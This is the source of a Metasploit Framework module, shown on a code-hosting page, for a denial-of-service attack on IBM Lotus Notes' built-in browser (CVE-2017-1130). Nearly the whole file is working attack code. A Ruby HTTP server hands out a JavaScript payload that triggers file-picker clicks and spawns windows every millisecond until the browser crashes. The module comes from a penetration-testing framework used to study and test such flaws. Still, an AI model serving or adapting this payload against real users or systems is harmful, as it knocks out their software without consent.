Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
19850 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpServer

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'IBM Notes Denial Of Service',

14
        'Description' => %q{

15
          This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.

16
          If successful, the browser will crash after viewing the webpage.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [

20
          'Dhiraj Mishra',

21
        ],

22
        'References' => [

23
          ['EDB', '42604'],

24
          [ 'CVE', '2017-1130' ]

25
        ],

26
        'DisclosureDate' => '2017-08-31',

27
        'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],

28
        'PassiveActions' => [ 'WebServer' ],

29
        'DefaultAction' => 'WebServer',

30
        'Notes' => {

31
          'Stability' => [CRASH_SERVICE_DOWN],

32
          'SideEffects' => [],

33
          'Reliability' => []

34
        }

35
      )

36
    )

37
  end

38


39
  def run

40
    exploit # start http server

41
  end

42


43
  def setup

44
    @html = %|

45
<html><body>

46
<input type="file" id="f">

47
<script>

48
var w;

49
var kins = {};

50
var i = 1;

51
f.click();

52
setInterval("f.click()", 1);

53
setInterval(function(){

54
          for (var k in kins) {

55
          if (kins[k] && kins[k].status === undefined) {

56
          kins[k].close();

57
          delete kins[k];

58
           }

59
         }

60
        w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');

61
        if (w) {

62
                kins[i] = w;

63
                i++;

64
        }

65
}, 1);

66
</script>

67
</body></html>

68
    |

69
  end

70


71
  def on_request_uri(cli, _request)

72
    print_status('Sending response')

73
    send_response(cli, @html)

74
  end

75
end

76


77